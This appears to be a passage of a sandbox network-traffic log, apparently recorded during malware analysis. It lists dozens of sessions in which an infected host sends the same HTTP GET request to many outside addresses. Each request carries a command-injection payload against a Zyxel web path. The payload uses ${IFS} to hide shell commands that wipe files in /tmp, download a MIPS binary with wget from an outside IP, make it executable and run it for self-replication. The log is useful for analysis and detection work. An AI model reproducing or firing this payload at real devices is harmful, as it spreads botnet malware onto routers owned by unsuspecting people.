                                      Jan 19, 2024 17:29:52.166240931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9331192.168.2.145013813.115.101.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166255951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9332192.168.2.1460672208.134.147.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166311979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9333192.168.2.145773295.221.2.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166363955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9334192.168.2.1434220147.176.135.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166393995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9335192.168.2.1456508123.185.207.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166409016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9336192.168.2.144777231.250.225.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166456938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9337192.168.2.1450698152.16.174.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166536093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9338192.168.2.14410981.178.193.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166583061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9339192.168.2.1455852108.185.147.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166610956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9340192.168.2.1439044146.4.180.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166611910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9341192.168.2.1450008160.67.248.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166661024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9342192.168.2.145372413.130.183.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166661978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9343192.168.2.1459618184.130.167.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166697979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9344192.168.2.1459498222.196.40.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166733980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9345192.168.2.1436864202.168.34.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166765928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9346192.168.2.1439800131.45.63.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166794062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9347192.168.2.144800661.28.176.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166834116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9348192.168.2.145840095.33.16.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166867971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9349192.168.2.1445662108.37.128.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166906118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9350192.168.2.1436170144.220.110.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166965008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9351192.168.2.1448546189.123.174.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166991949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9352192.168.2.144367468.61.66.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167043924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9353192.168.2.14483502.118.222.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167072058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9354192.168.2.143719473.13.37.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167112112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9355192.168.2.1446768119.81.125.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167150021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9356192.168.2.1446634193.29.121.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167184114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9357192.168.2.1448856134.185.204.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167215109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9358192.168.2.144086672.216.1.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167275906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9359192.168.2.1433610139.255.42.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167295933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9360192.168.2.1440540202.183.253.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167352915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9361192.168.2.1435884131.220.153.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167375088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9362192.168.2.144842888.101.17.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167423964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9363192.168.2.144139284.165.184.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167491913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9364192.168.2.1442366135.122.219.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167526960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9365192.168.2.1443700133.18.216.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167567968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9366192.168.2.1442964199.79.73.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167589903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9367192.168.2.1460126131.174.232.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167642117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9368192.168.2.144278414.240.134.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167692900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9369192.168.2.1451162107.146.81.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167743921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9370192.168.2.145858458.174.97.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167746067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9371192.168.2.1458830143.249.171.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167798996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9372192.168.2.1437012163.170.247.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167821884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9373192.168.2.1447770119.33.39.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167845964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9374192.168.2.1452170169.241.0.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167896986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9375192.168.2.1453626204.228.137.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.167929888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9376192.168.2.14576228.79.181.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168034077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9377192.168.2.1454778208.132.14.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168061972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9378192.168.2.145580863.57.208.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168121099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9379192.168.2.14576841.65.34.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168154955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9380192.168.2.1452914144.230.171.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168185949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9381192.168.2.1454894108.186.137.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168227911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9382192.168.2.1435216170.167.143.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168279886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9383192.168.2.1457868185.247.17.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168314934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9384192.168.2.14411649.153.242.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168353081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9385192.168.2.1452224102.162.229.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168369055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9386192.168.2.144077491.26.7.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168442965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9387192.168.2.1435480113.168.198.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168463945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9388192.168.2.1444684181.111.228.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168509960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9389192.168.2.143912248.98.15.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168546915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9390192.168.2.1452554103.0.191.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168603897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9391192.168.2.145155068.202.16.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168631077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9392192.168.2.1445224187.251.192.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168687105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9393192.168.2.143521071.47.130.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.168723106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9394192.168.2.145086452.28.42.163443
                                      TimestampBytes transferredDirectionData
